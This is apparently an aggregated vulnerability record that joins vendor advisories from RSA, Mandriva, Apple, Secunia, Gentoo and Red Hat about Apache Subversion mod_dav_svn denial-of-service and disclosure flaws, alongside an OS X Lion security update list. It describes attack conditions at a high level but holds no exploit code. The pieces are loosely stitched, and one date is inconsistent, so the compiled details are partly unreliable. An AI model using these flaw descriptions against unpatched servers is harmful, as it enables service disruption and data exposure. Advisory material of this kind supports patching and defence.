Documentation: To obtain RSA documentation, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com and click Products in the top navigation menu. Select the specific product whose documentation you want to obtain. Scroll to the section for the product version that you want and click the set link. Severity Rating: For an explanation of Severity Ratings, refer to the Knowledge Base Article, \x93Security Advisories Severity Rating\x94 at https://knowledge.rsasecurity.com/scolcms/knowledge.aspx?solution=a46604. RSA recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability. Obtaining More Information: For more information about RSA products, visit the RSA web site at http://www.rsa.com. Getting Support and Service: For customers with current maintenance contracts, contact your local RSA Customer Support center with any additional questions regarding this RSA SecurCare Note. For contact telephone numbers or e-mail addresses, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com, click Help & Contact, and then click the Contact Us - Phone tab or the Contact Us - Email tab. General Customer Support Information: http://www.rsa.com/node.aspx?id=1264 RSA SecurCare Online: https://knowledge.rsasecurity.com EOPS Policy: RSA has a defined End of Primary Support policy associated with all major versions. Please refer to the link below for additional details. http://www.rsa.com/node.aspx?id=2575 SecurCare Online Security Advisories RSA, The Security Division of EMC, distributes SCOL Security Advisories in order to bring to the attention of users of the affected RSA products important security information. RSA recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. RSA disclaim all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event shall RSA or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if RSA or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. About RSA SecurCare Notes & Security Advisories Subscription RSA SecurCare Notes & Security Advisories are targeted e-mail messages that RSA sends you based on the RSA product family you currently use. If you\x92d like to stop receiving RSA SecurCare Notes & Security Advisories, or if you\x92d like to change which RSA product family Notes & Security Advisories you currently receive, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com/scolcms/help.aspx?_v=view3. Following the instructions on the page, remove the check mark next to the RSA product family whose Notes & Security Advisories you no longer want to receive. Click the Submit button to save your selection. Sincerely, RSA Customer Support -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.13 (Cygwin) iEYEARECAAYFAlHBwyMACgkQtjd2rKp+ALwI0gCbBNOxiDjCZzTl293lMa53Yy2r pcsAn2UpV1x8Zg4031kyOrW5LfV2vner =W+qW -----END PGP SIGNATURE-----
var-201106-0131 The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.17, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request for a baselined WebDAV resource, as exploited in the wild in May 2011. Apache Subversion is prone to multiple vulnerabilities, including two denial-of-service issues and an information-disclosure issue. Attackers can exploit these issues to crash the application, exhaust all memory resources, or obtain potentially sensitive information. Versions prior to Subversion 1.6.17 are vulnerable. The mod_dav_svn Apache HTTPD server module may in certain cenarios enter a logic loop which does not exit and which allocates emory in each iteration, ultimately exhausting all the available emory on the server which can lead to a DoS (Denial Of Service) (CVE-2011-1783). The mod_dav_svn Apache HTTPD server module may leak to remote users the file contents of files configured to be unreadable by those users (CVE-2011-1921). Packages for 2009.0 are provided as of the Extended Maintenance Program. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFN6cg2mqjQ0CJFipgRAqj2AKCRyKt813e0OmWSTU5bL58KCmUwowCfT6RY DDOtowgSctAg4EX+tLXIvRQ= =zsmM -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2012-02-01-1 OS X Lion v10.7.3 and Security Update 2012-001 OS X Lion v10.7.3 and Security Update 2012-001 is now available and addresses the following: Address Book Available for: OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: An attacker in a privileged network position may intercept CardDAV data Description: Address Book supports Secure Sockets Layer (SSL) for accessing CardDAV. A downgrade issue caused Address Book to attempt an unencrypted connection if an encrypted connection failed. An attacker in a privileged network position could abuse this behavior to intercept CardDAV data. This issue is addressed by not downgrading to an unencrypted connection without user approval. CVE-ID CVE-2011-3444 : Bernard Desruisseaux of Oracle Corporation Apache Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Multiple vulnerabilities in Apache Description: Apache is updated to version 2.2.21 to address several vulnerabilities, the most serious of which may lead to a denial of service. Further information is available via the Apache web site at http://httpd.apache.org/ CVE-ID CVE-2011-3348 Apache Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: An attacker may be able to decrypt data protected by SSL Description: There are known attacks on the confidentiality of SSL 3.0 and TLS 1.0 when a cipher suite uses a block cipher in CBC mode. Apache disabled the 'empty fragment' countermeasure which prevented these attacks. This issue is addressed by providing a configuration parameter to control the countermeasure and enabling it by default. CVE-ID CVE-2011-3389 CFNetwork Available for: OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Visiting a maliciously crafted website may lead to the disclosure of sensitive information Description: An issue existed in CFNetwork's handling of malformed URLs. When accessing a maliciously crafted URL, CFNetwork could send the request to an incorrect origin server. This issue does not affect systems prior to OS X Lion. CVE-ID CVE-2011-3246 : Erling Ellingsen of Facebook CFNetwork Available for: OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Visiting a maliciously crafted website may lead to the disclosure of sensitive information Description: An issue existed in CFNetwork's handling of malformed URLs. When accessing a maliciously crafted URL, CFNetwork could send unexpected request headers. This issue does not affect systems prior to OS X Lion. CVE-ID CVE-2011-3447 : Erling Ellingsen of Facebook ColorSync Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8 Impact: Viewing a maliciously crafted image with an embedded ColorSync profile may lead to an unexpected application termination or arbitrary code execution Description: An integer overflow existed in the handling of images with an embedded ColorSync profile, which may lead to a heap buffer overflow. This issue does not affect OS X Lion systems. CVE-ID CVE-2011-0200 : binaryproof working with TippingPoint's Zero Day Initiative CoreAudio Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8 Impact: Playing maliciously crafted audio content may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the handling of AAC encoded audio streams. This issue does not affect OS X Lion systems. CVE-ID CVE-2011-3252 : Luigi Auriemma working with TippingPoint's Zero Day Initiative CoreMedia Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: A heap buffer overflow existed in CoreMedia's handling of H.264 encoded movie files. CVE-ID CVE-2011-3448 : Scott Stender of iSEC Partners CoreText Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Viewing or downloading a document containing a maliciously crafted embedded font may lead to an unexpected application termination or arbitrary code execution Description: A use after free issue existed in the handling of font files. CVE-ID CVE-2011-3449 : Will Dormann of the CERT/CC CoreUI Available for: OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Visiting a malicious website may lead to an unexpected application termination or arbitrary code execution Description: An unbounded stack allocation issue existed in the handling of long URLs. This issue does not affect systems prior to OS X Lion. CVE-ID CVE-2011-3450 : Ben Syverson curl Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: A remote server may be able to impersonate clients via GSSAPI requests Description: When doing GSSAPI authentication, libcurl unconditionally performs credential delegation. This issue is addressed by disabling GSSAPI credential delegation. CVE-ID CVE-2011-2192 Data Security Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: An attacker with a privileged network position may intercept user credentials or other sensitive information Description: Two certificate authorities in the list of trusted root certificates have independently issued intermediate certificates to DigiCert Malaysia. DigiCert Malaysia has issued certificates with weak keys that it is unable to revoke. An attacker with a privileged network position could intercept user credentials or other sensitive information intended for a site with a certificate issued by DigiCert Malaysia. This issue is addressed by configuring default system trust settings so that DigiCert Malaysia's certificates are not trusted. We would like to acknowledge Bruce Morton of Entrust, Inc. for reporting this issue. dovecot Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: An attacker may be able to decrypt data protected by SSL Description: There are known attacks on the confidentiality of SSL 3.0 and TLS 1.0 when a cipher suite uses a block cipher in CBC mode. Dovecot disabled the 'empty fragment' countermeasure which prevented these attacks. This issue is addressed by enabling the countermeasure. CVE-ID CVE-2011-3389 : Apple filecmds Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Decompressing a maliciously crafted compressed file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the 'uncompress' command line tool. CVE-ID CVE-2011-2895 ImageIO Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8 Impact: Viewing a maliciously crafted TIFF file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in ImageIO's handling of CCITT Group 4 encoded TIFF files. This issue does not affect OS X Lion systems. CVE-ID CVE-2011-0241 : Cyril CATTIAUX of Tessi Technologies ImageIO Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Viewing a maliciously crafted TIFF file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in libtiff's handling of ThunderScan encoded TIFF images. This issue is address by updating libtiff to version 3.9.5. CVE-ID CVE-2011-1167 ImageIO Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Multiple vulnerabilities in libpng 1.5.4 Description: libpng is updated to version 1.5.5 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the libpng website at http://www.libpng.org/pub/png/libpng.html CVE-ID CVE-2011-3328 Internet Sharing Available for: OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: A Wi-Fi network created by Internet Sharing may lose security settings after a system update Description: After updating to a version of OS X Lion prior to 10.7.3, the Wi-Fi configuration used by Internet Sharing may revert to factory defaults, which disables the WEP password. This issue only affects systems with Internet Sharing enabled and sharing the connection to Wi-Fi. This issue is addressed by preserving the Wi-Fi configuration during a system update. CVE-ID CVE-2011-3452 : an anonymous researcher Libinfo Available for: OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Visiting a maliciously crafted website may lead to the disclosure of sensitive information Description: An issue existed in Libinfo's handling of hostname lookup requests. Libinfo could return incorrect results for a maliciously crafted hostname. This issue does not affect systems prior to OS X Lion. CVE-ID CVE-2011-3441 : Erling Ellingsen of Facebook libresolv Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Applications that use OS X's libresolv library may be vulnerable to an unexpected application termination or arbitrary code execution Description: An integer overflow existed in the parsing of DNS resource records, which may lead to heap memory corruption. CVE-ID CVE-2011-3453 : Ilja van Sprundel of IOActive libsecurity Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Some EV certificates may be trusted even if the corresponding root has been marked as untrusted Description: The certificate code trusted a root certificate to sign EV certificates if it was on the list of known EV issuers, even if the user had marked it as 'Never Trust' in Keychain. The root would not be trusted to sign non-EV certificates. CVE-ID CVE-2011-3422 : Alastair Houghton OpenGL Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Applications that use OS X's OpenGL implementation may be vulnerable to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in the handling of GLSL compilation. CVE-ID CVE-2011-3457 : Chris Evans of the Google Chrome Security Team, and Marc Schoenefeld of the Red Hat Security Response Team PHP Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Multiple vulnerabilities in PHP 5.3.6 Description: PHP is updated to version 5.3.8 to address several vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the PHP web site at http://www.php.net CVE-ID CVE-2011-1148 CVE-2011-1657 CVE-2011-1938 CVE-2011-2202 CVE-2011-2483 CVE-2011-3182 CVE-2011-3189 CVE-2011-3267 CVE-2011-3268 PHP Available for: OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Viewing a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in FreeType's handling of Type 1 fonts. This issue is addressed by updating FreeType to version 2.4.7. Further information is available via the FreeType site at http://www.freetype.org/ CVE-ID CVE-2011-3256 : Apple PHP Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Multiple vulnerabilities in libpng 1.5.4 Description: libpng is updated to version 1.5.5 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the libpng website at http://www.libpng.org/pub/png/libpng.html CVE-ID CVE-2011-3328 QuickTime Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Opening a maliciously crafted MP4 encoded file may lead to an unexpected application termination or arbitrary code execution Description: An uninitialized memory access issue existed in the handling of MP4 encoded files. CVE-ID CVE-2011-3458 : Luigi Auriemma and pa_kt both working with TippingPoint's Zero Day Initiative QuickTime Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: A signedness issue existed in the handling of font tables embedded in QuickTime movie files. CVE-ID CVE-2011-3248 : Luigi Auriemma working with TippingPoint's Zero Day Initiative QuickTime Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: An off by one buffer overflow existed in the handling of rdrf atoms in QuickTime movie files. CVE-ID CVE-2011-3459 : Luigi Auriemma working with TippingPoint's Zero Day Initiative QuickTime Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Viewing a maliciously crafted JPEG2000 image file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the handling of JPEG2000 files. CVE-ID CVE-2011-3250 : Luigi Auriemma working with TippingPoint's Zero Day Initiative QuickTime Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Processing a maliciously crafted PNG image may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the handling of PNG files. CVE-ID CVE-2011-3460 : Luigi Auriemma working with TippingPoint's Zero Day Initiative QuickTime Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the handling of FLC encoded movie files CVE-ID CVE-2011-3249 : Matt 'j00ru' Jurczyk working with TippingPoint's Zero Day Initiative SquirrelMail Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8 Impact: Multiple vulnerabilities in SquirrelMail Description: SquirrelMail is updated to version 1.4.22 to address several vulnerabilities, the most serious of which is a cross-site scripting issue. This issue does not affect OS X Lion systems. Further information is available via the SquirrelMail web site at http://www.SquirrelMail.org/ CVE-ID CVE-2010-1637 CVE-2010-2813 CVE-2010-4554 CVE-2010-4555 CVE-2011-2023 Subversion Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Accessing a Subversion repository may lead to the disclosure of sensitive information Description: Subversion is updated to version 1.6.17 to address multiple vulnerabilities, the most serious of which may lead to the disclosure of sensitive information. Further information is available via the Subversion web site at http://subversion.tigris.org/ CVE-ID CVE-2011-1752 CVE-2011-1783 CVE-2011-1921 Time Machine Available for: OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: A remote attacker may access new backups created by the user's system Description: The user may designate a remote AFP volume or Time Capsule to be used for Time Machine backups. Time Machine did not verify that the same device was being used for subsequent backup operations. An attacker who is able to spoof the remote volume could gain access to new backups created by the user's system. This issue is addressed by verifying the unique identifier associated with a disk for backup operations. CVE-ID CVE-2011-3462 : Michael Roitzsch of the Technische Universitat Dresden Tomcat Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8 Impact: Multiple vulnerabilities in Tomcat 6.0.32 Description: Tomcat is updated to version 6.0.33 to address multiple vulnerabilities, the most serious of which may lead to the disclosure of sensitive information. Tomcat is only provided on Mac OS X Server systems. This issue does not affect OS X Lion systems. Further information is available via the Tomcat site at http://tomcat.apache.org/ CVE-ID CVE-2011-2204 WebDAV Sharing Available for: OS X Lion Server v10.7 to v10.7.2 Impact: Local users may obtain system privileges Description: An issue existed in WebDAV Sharing's handling of user authentication. A user with a valid account on the server or one of its bound directories could cause the execution of arbitrary code with system privileges. This issue does not affect systems prior to OS X Lion. CVE-ID CVE-2011-3463 : Gordon Davisson of Crywolf Webmail Available for: OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Viewing a maliciously crafted e-mail message may lead to the disclosure of message content Description: A cross-site scripting vulnerability existed in the handling of mail messages. This issue is addressed by updating Roundcube Webmail to version 0.6. This issue does not affect systems prior to OS X Lion. Further information is available via the Roundcube site at http://trac.roundcube.net/ CVE-ID CVE-2011-2937 X11 Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Viewing a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in FreeType's handling of Type 1 fonts. This issue is addressed by updating FreeType to version 2.4.7. Further information is available via the FreeType site at http://www.freetype.org/ CVE-ID CVE-2011-3256 : Apple OS X Lion v10.7.3 and Security Update 2012-001 may be obtained from the Software Update pane in System Preferences, or Apple's Software Downloads web site: http://www.apple.com/support/downloads/ The Software Update utility will present the update that applies to your system configuration. Only one is needed, either Security Update 2021-001 or OS X v10.7.3. For OS X Lion v10.7.2 The download file is named: MacOSXUpd10.7.3.dmg Its SHA-1 digest is: 7102fe8f9f47286c45dfa35f6e84e7f730493a7c For OS X Lion v10.7 and v10.7.1 The download file is named: MacOSXUpdCombo10.7.3.dmg Its SHA-1 digest is: 07dfce300f6801eb63d9ac13e0bec84e1862a16c For OS X Lion Server v10.7.2 The download file is named: MacOSXServerUpd10.7.3.dmg Its SHA-1 digest is: 55a9571635d4ec088c142d68132d0d69fcb8867d For OS X Lion Server v10.7 and v10.7.1 The download file is named: MacOSXServerUpdCombo10.7.3.dmg Its SHA-1 digest is: 2c87824f09734499ea166ea0617a3ac21ecf832b For Mac OS X v10.6.8 The download file is named: SecUpd2012-001Snow.dmg Its SHA-1 digest is: 40875ee8cb609bbaefc8f421a9c34cc353db42b8 For Mac OS X Server v10.6.8 The download file is named: SecUpdSrvr2012-001.dmg Its SHA-1 digest is: 53b3ca5548001a9920aeabed4a034c6e4657fe20 Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.16 (Darwin) iQEcBAEBAgAGBQJPKYxNAAoJEGnF2JsdZQeeLiIIAMLhH2ipDFrhCsw/n4VDeF1V P6jSkGXC9tBBVMvw1Xq4c2ok4SI34bDfMlURAVR+dde/h6nIZR24aLQVoDLjJuIp RrO2dm1nQeozLJSx2NbxhVh54BucJdKp4xS1GkDNxkqcdh04RE9hRURXdKagnfGy 9P8QQPOQmKAiWos/LYhCPDInMfrpVNvEVwP8MCDP15g6hylN4De/Oyt7ZshPshSf MnAFObfBTGX5KioVqTyfdlBkKUfdXHJux61QEFHn8eadX6+/6IuKbUvK9B0icc8E pvbjOxQatFRps0KNWeIsKQc5i6iQoJhocAiIy6Y6LCuZQuSXCImY2RWXkVYzbWo= =c1eU -----END PGP SIGNATURE----- . ---------------------------------------------------------------------- Join Secunia @ FIRST Conference, 12-17 June, Hilton Vienna, Austria See to the presentation "The Dynamics and Threats of End-Point Software Portfolios" by Secunia's Research Analyst Director, Stefan Frei. Read more: http://conference.first.org/ ---------------------------------------------------------------------- TITLE: Apache Subversion mod_dav_svn Two Denial of Service Vulnerabilities SECUNIA ADVISORY ID: SA44681 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/44681/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=44681 RELEASE DATE: 2011-06-02 DISCUSS ADVISORY: http://secunia.com/advisories/44681/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/44681/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=44681 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Two vulnerabilities have been reported in Apache Subversion, which can be exploited by malicious people to cause a DoS (Denial of Service). PROVIDED AND/OR DISCOVERED BY: 1) Reported by the vendor 2) The vendor credits Ivan Zhakov, VisualSVN. ORIGINAL ADVISORY: http://subversion.apache.org/security/CVE-2011-1752-advisory.txt http://subversion.apache.org/security/CVE-2011-1783-advisory.txt http://subversion.apache.org/security/CVE-2011-1921-advisory.txt OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201309-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Low Title: Subversion: Multiple vulnerabilities Date: September 23, 2013 Bugs: #350166, #356741, #369065, #463728, #463860, #472202, #482166 ID: 201309-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in Subversion, allowing attackers to cause a Denial of Service, escalate privileges, or obtain sensitive information. Background ========== Subversion is a versioning system designed to be a replacement for CVS. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-vcs/subversion < 1.7.13 >= 1.7.13 Description =========== Multiple vulnerabilities have been discovered in Subversion. Please review the CVE identifiers referenced below for details. A local attacker could escalate his privileges to the user running svnserve. Workaround ========== There is no known workaround at this time. Resolution ========== All Subversion users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-vcs/subversion-1.7.13" References ========== [ 1 ] CVE-2010-4539 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4539 [ 2 ] CVE-2010-4644 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4644 [ 3 ] CVE-2011-0715 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0715 [ 4 ] CVE-2011-1752 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1752 [ 5 ] CVE-2011-1783 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1783 [ 6 ] CVE-2011-1921 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1921 [ 7 ] CVE-2013-1845 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1845 [ 8 ] CVE-2013-1846 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1846 [ 9 ] CVE-2013-1847 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1847 [ 10 ] CVE-2013-1849 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1849 [ 11 ] CVE-2013-1884 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1884 [ 12 ] CVE-2013-1968 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1968 [ 13 ] CVE-2013-2088 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2088 [ 14 ] CVE-2013-2112 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2112 [ 15 ] CVE-2013-4131 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4131 [ 16 ] CVE-2013-4277 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4277 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201309-11.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2013 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Moderate: subversion security update Advisory ID: RHSA-2011:0862-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2011-0862.html Issue date: 2011-06-08 CVE Names: CVE-2011-1752 CVE-2011-1783 CVE-2011-1921 ===================================================================== 1. Summary: Updated subversion packages that fix three security issues are now available for Red Hat Enterprise Linux 5 and 6. The Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: RHEL Desktop Workstation (v. 5 client) - i386, x86_64 Red Hat Enterprise Linux (v. 5 server) - i386, ia64, ppc, s390x, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - noarch, x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, noarch, x86_64 3. Description: Subversion (SVN) is a concurrent version control system which enables one or more users to collaborate in developing and maintaining a hierarchy of files and directories while keeping a history of all changes. The mod_dav_svn module is used with the Apache HTTP Server to allow access to Subversion repositories via HTTP. An infinite loop flaw was found in the way the mod_dav_svn module processed certain data sets. If the SVNPathAuthz directive was set to "short_circuit", and path-based access control for files and directories was enabled, a malicious, remote user could use this flaw to cause the httpd process serving the request to consume an excessive amount of system memory. (CVE-2011-1783) A NULL pointer dereference flaw was found in the way the mod_dav_svn module processed requests submitted against the URL of a baselined resource. A malicious, remote user could use this flaw to cause the httpd process serving the request to crash. (CVE-2011-1752) An information disclosure flaw was found in the way the mod_dav_svn module processed certain URLs when path-based access control for files and directories was enabled. A malicious, remote user could possibly use this flaw to access certain files in a repository that would otherwise not be accessible to them. Note: This vulnerability cannot be triggered if the SVNPathAuthz directive is set to "short_circuit". 